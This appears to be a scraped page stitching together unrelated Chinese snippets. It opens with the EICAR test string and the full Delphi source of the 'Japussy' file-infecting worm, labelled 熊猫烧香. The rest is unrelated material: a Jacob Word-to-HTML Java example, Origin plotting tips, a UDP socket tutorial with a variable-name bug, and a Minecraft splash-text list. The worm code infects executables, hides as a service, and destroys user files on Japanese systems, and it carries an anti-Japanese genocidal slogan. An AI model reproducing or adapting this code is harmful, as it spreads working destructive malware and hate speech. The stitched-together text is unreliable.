不行的 得用虚拟机才可以测试病毒代码 无需下载,把下面这段代码复制到记事本里,保存为文本文件
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
熊猫烧香
ogram Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end
java中的jacob将word文档转化为HTML文件问题
1、到官网下载Jacob,
2、将压缩包解压后,Jacob.jar添加到Libraries中(先复制到项目目录中,右键单击jar包选择Build Path—>Add to Build Path);
3、将Jacob.dll放至当前项目所用到的“jre\bin”下面(比如Eclipse正在用的Jre路径是C:\Java\jdk1.7.0_17\jre\bin)。
Ps:按照上面的步骤配置的,基本没有问题,但是有些电脑可能还会报错,比如:java.lang.UnsatisfiedLinkError: no jacob in java.library.path,这是系统没有加载到jacob.dll,网上解决方法是将Jacob.dll放至“WINDOWS\SYSTEM32”下面。
Java代码:
public class JacobUtil {
// 8 代表word保存成html
public static final int WORD_HTML = 8;
public static void main(String[] args) {
String docfile = "C:\\Users\\无名\\Desktop\\xxx.doc";
String htmlfile = "C:\\Users\\无名\\Desktop\\xxx.html";
JacobUtil.wordToHtml(docfile, htmlfile);
}
/**
* WORD转HTML
* @param docfile WORD文件全路径
* @param htmlfile 转换后HTML存放路径
*/
public static void wordToHtml(String docfile, String htmlfile)
{
// 启动word应用程序(Microsoft Office Word 2003)
ActiveXComponent app = new ActiveXComponent("Word.Application");
System.out.println("*****正在转换...*****");
try
{
// 设置word应用程序不可见
app.setProperty("Visible", new Variant(false));
// documents表示word程序的所有文档窗口,(word是多文档应用程序)
Dispatch docs = app.getProperty("Documents").toDispatch();
// 打开要转换的word文件
Dispatch doc = Dispatch.invoke(
docs,
"Open",
Dispatch.Method,
new Object[] { docfile, new Variant(false),
new Variant(true) }, new int[1]).toDispatch();
// 作为html格式保存到临时文件
Dispatch.invoke(doc, "SaveAs", Dispatch.Method, new Object[] {
htmlfile, new Variant(WORD_HTML) }, new int[1]);
// 关闭word文件
Dispatch.call(doc, "Close", new Variant(false));
}catch (Exception e){
e.printStackTrace();
}finally{
//关闭word应用程序
app.invoke("Quit", new Variant[] {});
}
System.out.println("*****转换完毕********");
}
}
如何用origin导入数据作图
已经画好坐标轴,需要把坐标轴右侧和上侧也连上,成一封闭的。如何做?
点中坐标轴右击,再选Title & Format,里面依次有bottom, top, left, right。选Top, 打钩show axis & tick,就会显示上边的坐标轴。如果不需要轴上的标尺,则在Major和Minor中选择none。右边的线同上。
Major和Minor的作用是标尺的刻度线向上(in)还是向下(out)还是 无(none)。
画好图之后,菜单栏—Edit---Copy page (编辑—复制页面),之后到word直接粘贴即可。Word里的图直接双击,可以直接打开origin,重新编辑和修改图。修改好之后,菜单栏--文件—更新***.doc,即可同步到word。此时出现的文件是可以用Origin打开的,如果不想别人打开,将Word中的图片Ctrl+C,再Ctrl+V就可以了。双击图片,看看图片大小效果吧,ps. 1 inch = 2.54 centimeter。用origin做完图后,怎么导出放在word中呢,用cope page 还是export page啊,论文中都是用什么形式的呢?cope page,粘到word中双击还可以修改。论文写作中使用tiff格式比较多,如果图表已经完成,可以直接输出为tiff格式的图片,再插入到文档中。export比较好,可以输出多种格式的图片:bmp,jpg, eps,pdf等等,几乎什么格式都有了。当然,你如果想在word里还对图进行修改,copy是最好了,这样在word里面双击就可以修改图了。正式刊发的论文大多偏爱eps的,清晰而又不大。投文章的话,大多数期刊都要求用TIFF格式的,copy page肯定不行,还是用export好一些,导出时,图片格式和分辨率都是可选的,而且用图片格式安全一些,不会在不知情的情况下被改动,用copy page的话,只要是word文档,任何人都是可以改动图中数据的。wiley的期刊一般要求转成TIFF格式, 在origin里面导出成TIFF格式, 好像选择LZW压缩方式, 否则文件会非常大.
word里的图双击进入origin后,工作表区域只有Graph,没有Data,可以生成Data。在图上右击,选择Create worksheet Data。
选中一列(Colum),右击,set as X, Y, Z。可以设置X轴和Y轴。可以有多个X轴和Y轴,位置任意。
在一列上右击,insert,可以插入新的一列(Colum)。或者:在空白处右击,Add New Colum。
若这些曲线的横坐标是同一组数据,则方法是:在B(Y)后面的空白处右击,选择“add new volumn”,可以添加好几个,可以看到C(Y)、D(Y)等,然后这些不同的Y轴数据共用横轴数据A(X),作图。
若这些曲线的横坐标是不同一组数据,则如上法添加新的列之后,选中C(Y)右击,选择“set as ”点“X”,则会看到如下所示的样子。然后选中所有数据作图即可
公式计算:
以此为例。A列是温度单位为K,要换算成℃,新建Colum B,选中B,右击,Set Colum Values, 会出现对话框,输入 Col (A) – 273.15即可。
曲线中圆圈,方块,三角等,空心、实心等,大小,线的粗细,都可以改变。点其中一个圆圈,双击,出现如下对话框。
选择 Symbol。Preview框的右边有个小框,可以选择不同的形状。Size可以改图案的大小。
选择Line, 改曲线的粗细。
origin7 打开“文件”--“导入ASCII”,选择txt文件格式,选择所选的文件,点OK。可看到数据为两列,也可添加多列,在“柱形图”--“添加新建列”。然后点左下角的“LINE”图标,作图。
坐标轴范围,from 起始值。To 终值。 Increment:间隔
origin的摄氏度符号,要写成宋体的字体才可以在word里正常显示。
而“@宋体”是倒着的宋体。
origin的图文字除了英文字母和数字可以用默认的字体外。其余的文字包括中文,希腊字母等还有单位如温度℃都要选为中文如宋体等这样复制到Word才不会出现乱码的
word中一些技巧
人名和化学式中的·方法:拼音输入dian(点),选第5个,这个点是中文的,再换成英文的字体就行。
℃:拼音输入sheshidu(摄氏度),选第5个,再换成英文的字体。
°:拼音输入du(度),第3个,再换成英文字体。
但是如何精确控制Origin输出到Word中图片的大小图例的方法很难找到。下面就班门弄斧,介绍下我的方法,希望能为大家省些时间。步骤如下:1. View : Print View:保证WYSIWYG(所见即所得)。2. Format : Page:设置图片窗口的大小,例如ACS要求Width不大于3.25 inch。3. 将图片所有信息粗略调整到Page空间中(步骤2启用后,Page可能很小,需要后续细致设置)。4. View : Whole Page:步骤2显示Page放大,虽然此时屏幕尺寸可能大于设置尺寸,但不影响输出效果(如果你对自己的眼神很有信心,也可以跳过这一步)。5. 细致设置,如:坐标轴及曲线线宽0.5,图标5,其他字体大小10。6. Tools : Option:在弹出的对话框中选择Page,在Copy Page Setting下的Ratio选择100,其他可继续设置,如Advance : Set Resolutior 600 (设置复制比例100%,可以将此设为默认)。7. Edit : Copy Page。8. 在Word中选择“复制”——“选择性粘贴”——“图元文件”。9. 此时出现的文件是可以用Origin打开的,如果不想别人打开,将Word中的图片Ctrl+C,再Ctrl+V就可以了。双击图片,看看图片大小效果吧,ps. 1 inch = 2.54 centimeter。
origin 图中添加文字:右击,add text
最好不要复制黏贴,可以在word中,点击插入--对象--然后选择origin图像文件--选择连接,就ok了,以后在word中编辑图形时,直接双击图,就打开origin软件
Speed mode is on. 意思是当前是加速模式。当你导入图形包含的采样点过多,或者数据太丰富,origin会警告采用speedmode显示,解决的方法是:在你的曲线采样点上双击,出现plot details对话框,定位你所在的图层(鼠标点左边的Layer,成蓝色),一般是layers1,看到右边有size/speed,单击,下面有”speed mode,skip points if needed“的字样,下面有两个选项,worksheet data,matrix data把前面的勾都去掉,最后,点确定,就可以了,speed mode不会出现了,最后检查一下,同样的在Graph里面(鼠标点中左边的Graph)的Miscellaneous里面的”if speed mode is enable to display,apply to.....‘的前面的勾要去掉,同样确定
怎么将两个图谱放在一块做个对照呢?
把两个样品的数据都粘的ORIGN里,插入一列,在该列右键选set column values,在对话框中输入col(第二个样品y轴数据所在列的字母)+适当的数字,目的是让第二列y值在原有基础上大一些。将该列和第二个样品的x轴数据以及第一个样品的所有数据选中绘图。例如:
UDP和Socket通信步骤
UDP Server程序
1、编写UDP Server程序的步骤
(1)使用socket()来建立一个UDP socket,第二个参数为SOCK_DGRAM。
(2)初始化sockaddr_in结构的变量,并赋值。sockaddr_in结构定义:
struct sockaddr_in {
uint8_t sin_len;
sa_family_t sin_family;
in_port_t sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
这里使用“08”作为服务程序的端口,使用“INADDR_ANY”作为绑定的IP地址即任何主机上的地址。
(3)使用bind()把上面的socket和定义的IP地址和端口绑定。这里检查bind()是否执行成功,如果有错误就退出。这样可以防止服务程序重复运行的问题。
(4)进入无限循环程序,使用recvfrom()进入等待状态,直到接收到客户程序发送的数据,就处理收到的数据,并向客户程序发送反馈。这里是直接把收到的数据发回给客户程序。
2、udpserv.c程序内容:
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#define MAXLINE 80
#define SERV_PORT 8888
void do_echo(int sockfd, struct sockaddr *pcliaddr, socklen_t clilen)
{
int n;
socklen_t len;
char mesg[MAXLINE];
for(;;)
{
len = clilen;
/* waiting for receive data */
n = recvfrom(sockfd, mesg, MAXLINE, 0, pcliaddr, &len);
/* sent data back to client */
sendto(sockfd, mesg, n, 0, pcliaddr, len);
}
}
int main(void)
{
int sockfd;
struct sockaddr_in servaddr, cliaddr;
sockfd = socket(AF_INET, SOCK_DGRAM, 0); /* create a socket */
/* init servaddr */
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
servaddr.sin_port = htons(SERV_PORT);
/* bind address and port to socket */
if(bind(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
{
perror("bind error");
exit(1);
}
do_echo(sockfd, (struct sockaddr *)&cliaddr, sizeof(cliaddr));
return 0;
}
UDP Client程序
1、编写UDP Client程序的步骤
(1)初始化sockaddr_in结构的变量,并赋值。这里使用“8888”作为连接的服务程序的端口,从命令行参数读取IP地址,并且判断IP地址是否符合要求。
(2)使用socket()来建立一个UDP socket,第二个参数为SOCK_DGRAM。
(3)使用connect()来建立与服务程序的连接。与TCP协议不同,UDP的connect()并没有与服务程序三次握手。上面我们说了UDP是非连接的,实际上也可以是连接的。使用连接的UDP,kernel可以直接返回错误信息给用户程序,从而避免由于没有接收到数据而导致调用recvfrom()一直等待下去,看上去好像客户程序没有反应一样。
(4)向服务程序发送数据,因为使用连接的UDP,所以使用write()来替代sendto()。这里的数据直接从标准输入读取用户输入。
(5)接收服务程序发回的数据,同样使用read()来替代recvfrom()。
(6)处理接收到的数据,这里是直接输出到标准输出上。
2、udpclient.c程序内容:
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <unistd.h>
#define MAXLINE 80
#define SERV_PORT 8888
void do_cli(FILE *fp, int sockfd, struct sockaddr *pservaddr, socklen_t servlen)
{
int n;
char sendline[MAXLINE], recvline[MAXLINE + 1];
/* connect to server */
if(connect(sockfd, (struct sockaddr *)pservaddr, servlen) == -1)
{
perror("connect error");
exit(1);
}
while(fgets(sendline, MAXLINE, fp) != NULL)
{
/* read a line and send to server */
write(sockfd, sendline, strlen(sendline));
/* receive data from server */
n = read(sockfd, recvline, MAXLINE);
if(n == -1)
{
perror("read error");
exit(1);
}
recvline[n] = 0; /* terminate string */
fputs(recvline, stdout);
}
}
int main(int argc, char **argv)
{
int sockfd;
struct sockaddr_in srvaddr;
/* check args */
if(argc != 2)
{
printf("usage: udpclient <IPaddress>\n");
exit(1);
}
/* init servaddr */
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(SERV_PORT);
if(inet_pton(AF_INET, argv[1], &servaddr.sin_addr) <= 0)
{
printf("[%s] is not a valid IPaddress\n", argv[1]);
exit(1);
}
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
do_cli(stdin, sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
return 0;
}
运行例子程序
1、编译例子程序
使用如下命令来编译例子程序:
gcc -Wall -o udpserv udpserv.c
gcc -Wall -o udpclient udpclient.c
编译完成生成了udpserv和udpclient两个可执行程序。
2、运行UDP Server程序
执行./udpserv &命令来启动服务程序。我们可以使用netstat -ln命令来观察服务程序绑定的IP地址和端口,部分输出信息如下:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:32768 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:32768 0.0.0.0:*
udp 0 0 0.0.0.0:8888 0.0.0.0:*
udp 0 0 0.0.0.0:111 0.0.0.0:*
udp 0 0 0.0.0.0:882 0.0.0.0:*
可以看到udp处有“0.0.0.0:8888”的内容,说明服务程序已经正常运行,可以接收主机上任何IP地址且端口为8888的数据。
如果这时再执行./udpserv &命令,就会看到如下信息:
bind error: Address already in use
说明已经有一个服务程序在运行了。
3、运行UDP Client程序
执行./udpclient 127.0.0.1命令来启动客户程序,使用127.0.0.1来连接服务程序,执行效果如下:
Hello, World!
Hello, World!
this is a test
this is a test
^d
输入的数据都正确从服务程序返回了,按ctrl+d可以结束输入,退出程序。
如果服务程序没有启动,而执行客户程序,就会看到如下信息:
$ ./udpclient 127.0.0.1
test
read error: Connection refused
说明指定的IP地址和端口没有服务程序绑定,客户程序就退出了。这就是使用connect()的好处,注意,这里错误信息是在向服务程序发送数据后收到的,而不是在调用connect()时。如果你使用tcpdump程序来抓包,会发现收到的是ICMP的错误信息。
Minecraft我的世界游戏初始界面右上角的斜黄字是啥东西啊?
Minecraft右上角的黄字,俗称“小黄字”,是Minecraft随机出现的一个类似于调侃的消息,基本上可以无视,但是还是挺好玩的。
以下是小黄字的全部内容(手打翻译了一部分,可以参考,可能出现错误):
As seen on TV! (在电视上看见!)
Awesome! (超棒!)
100% pure! (100%纯正)
May contain nuts! (里面也许有坚果)
Better than Prey! (不知道)
More polygons! (更多多边形!)
Sexy! (性感!)
Limited edition! (极限编辑!)
Flashing letters! (流水般的字)
Made by Notch! (Notch(注:Minecraft创始人))
It's here! (就是这!)
Best in class!(班上最好!)
It's finished!(结束了!)
Kind of dragon free!(一种自由的龙!)
Excitement!
More than 500 sold!(销售量比500多!)
One of a kind!
Heaps of hits on YouTube!
Indev!
Spiders everywhere!
Check it out!
Holy cow, man!
It's a game!
Made in Sweden!
Uses LWJGL!
Reticulating splines!
Minecraft!
Yaaay!
Singleplayer!
Keyboard compatible!
Undocumented!
Ingots!
Exploding creepers!
That's no moon!
l33t!
Create!
Survive!
Dungeon!
Exclusive!
The bee's knees!
Down with O.P.P.!
Closed source!
Classy!
Wow!
Not on steam!
Oh man!
Awesome community!
Pixels!
Teetsuuuuoooo!
Kaaneeeedaaaa!
Now with difficulty!
Enhanced!
90% bug free!
Pretty!
12 herbs and spices!
Fat free!
Absolutely no memes!
Free dental!
Ask your doctor!
Minors welcome!
Cloud computing!
Legal in Finland!
Hard to label!
Technically good!
Bringing home the bacon!
Indie!
GOTY!
Ceci n'est pas une title screen!
Euclidian!
Now in 3D!
Inspirational!
Herregud!
Complex cellular automata!
Yes, sir!
Played by cowboys!
OpenGL 2.1 (if supported)!
Thousands of colors!
Try it!
Age of Wonders is better!
Try the mushroom stew!
Sensational!
Hot tamale, hot hot tamale!
Play him off, keyboard cat!
Guaranteed!
Macroscopic!
Bring it on!
Random splash!
Call your mother!
Monster infighting!
Loved by millions!
Ultimate edition!
Freaky!
You've got a brand new key!
Water proof!
Uninflammable!
Whoa, dude!
All inclusive!
Tell your friends!
NP is not in P!
Music by C418!
Livestreamed!
Haunted!
Polynomial!
Terrestrial!
All is full of love!
Full of stars!
Scientific!
Not as cool as Spock!
Collaborate and listen!
Never dig down!
Take frequent breaks!
Not linear!
Han shot first!
Nice to meet you!
Buckets of lava!
Ride the pig!
Larger than Earth!
sqrt(-1) love you!
Phobos anomaly!
Punching wood!
Falling off cliffs!
1% sugar!
150% hyperbole!
Synecdoche!
Let's danec!
Seecret Friday update!
Reference implementation!
Lewd with two dudes with food!
Kiss the sky!
20 GOTO 10!
Verlet intregration!
Peter Griffin!
Do not distribute!
Cogito ergo sum!
4815162342 lines of code!
A skeleton popped out!
The Work of Notch!
The sum of its parts!
BTAF used to be good!
I miss ADOM!
umop-apisdn!
OICU812!
Bring me Ray Cokes!
Finger-licking!
Thematic!
Pneumatic!
Sublime!
Octagonal!
Une baguette!
Gargamel plays it!
Rita is the new top dog!
SWM forever!
Representing Edsbyn!
Matt Damon!
Supercalifragilisticexpialidocious!
Consummate V's!
Cow Tools!
Double buffered!
Fan fiction!
Flaxkikare!
Jason! Jason! Jason!
Hotter than the sun!
Internet enabled!
Autonomous!
Engage!
Fantasy!
DRR! DRR! DRR!
Kick it root down!
Regional resources!
Woo, facepunch!
Woo, somethingawful!
Woo, /v/!
Woo, tigsource!
Woo, minecraftforum!
Woo, worldofminecraft!
Woo, reddit!
Woo, 2pp!
Google anlyticsed!
Now supports åäö!
Give us Gordon!
Tip your waiter!
Very fun!
12345 is a bad password!
Vote for net neutrality!
Lives in a pineapple under the sea!
MAP11 has two names!
Omnipotent!
Gasp!
...!
Bees, bees, bees, bees!
Jag känner en bot!
This text is hard to read if you play the game at the default resolution, but at 1080p it's fine!
Haha, LOL!
Hampsterdance!
Switches and ores!
Menger sponge!
idspispopd!
Eple (original edit)!
So fresh, so clean!
Slow acting portals!
Try the Nether!
Don't look directly at the bugs!
Oh, ok, Pigmen!
Finally with ladders!
Scary!
Play Minecraft, Watch Topgear, Get Pig!
Twittered about!
Jump up, jump up, and get down!
Joel is neat!
A riddle, wrapped in a mystery!
Huge tracts of land!
Welcome to your Doom!
Stay a while, stay forever!
Stay a while and listen!
Treatment for your rash!
"Autological" is!
Information wants to be free!
"Almost never" is an interesting concept!
Lots of truthiness!
The creeper is a spy!
Turing complete!
It's groundbreaking!
Let our battle's begin!
The sky is the limit!
Jeb has amazing hair!
Ryan also has amazing hair!
Casual gaming!
Undefeated!
Kinda like Lemmings!
Follow the train, CJ!
Leveraging synergy!
This message will never appear on the splash screen, isn't that weird?
DungeonQuest is unfair!
110813!
90210!
Check out the far lands!
Tyrion would love it!
Also try VVVVVV!
Also try Super Meat Boy!
Also try Terraria!
Also try Mount And Blade!
Also try Project Zomboid!
Also try World of Goo!
Also try Limbo!
Also try Pixeljunk Shooter!
Also try Braid!
That's super!
Bread is pain!
Read more books!
Khaaaaaaaaan!
Less addictive than TV Tropes!
More addictive than lemonade!
Bigger than a bread box!
Millions of peaches!
Fnord!
This is my true form!
Totally forgot about Dre!
Don't bother with the clones!
Pumpkinhead!
Hobo humping slobo babe!
Made by Jeb!
Has an ending!
Finally complete!
Feature packed!
Boots with the fur!
Stop, hammertime!
Testificates!
Conventional!
Homeomorphic to a 3-sphere!
Doesn't avoid double negatives!
Place ALL the blocks!
Does barrel rolls!
Meeting expectations!
PC gaming since 1873!
Ghoughpteighbteau tchoghs!
Déjà vu!
Déjà vu!
Got your nose!
Haley loves Elan!
Afraid of the big, black bat!
Doesn't use the U-word!
Child's play!
See you next Friday or so!
From the streets of Södermalm!
150 bpm for 400000 minutes!
Technologic!
Funk soul brother!
Pumpa kungen!
日本ハロー!
한국 안녕하세요!
Helo Cymru!
Cześć Polsko!
你好中国!
Привет Россия!
Γεια σου Ελλάδα!
My life for Aiur!
Lennart lennart = new Lennart();
I see your vocabulary has improved!
Who put it there?
You can't explain that!
if not ok then return end
§1C§2o§3l§4o§5r§6m§7a§8t§9i§ac
§kFUNKY LOL
Big Pointy Teeth!
Bekarton guards the gate!
Mmmph, mmph!
Don't feed avocados to parrots!
Swords for everyone!
Plz reply to my tweet!
.party()!
Take her pillow!
Put that cookie down!
Pretty scary!
I have a suggestion.
Now with extra hugs!
Now Java 6!
Woah.
HURNERJSGER?
What's up, Doc?
Now contains 32 random daily cats!
That's Numberwang!
pls rt
Do you want to join my server?
Put a little fence around it!
Throw a blanket over it!
One day, somewhere in the future, my work will be quoted!
Now with additional stuff!
Extra things!
Yay, puppies for everyone!
So sweet, like a nice bon bon!
Popping tags!
Very influential in its circle!
Now With Multiplayer!
Rise from your grave!
Warning! A huge battleship "STEVE" is approaching fast!
Blue warrior shot the food!
Run, coward! I hunger!
Flavor with no seasoning!
Strange, but not a stranger!
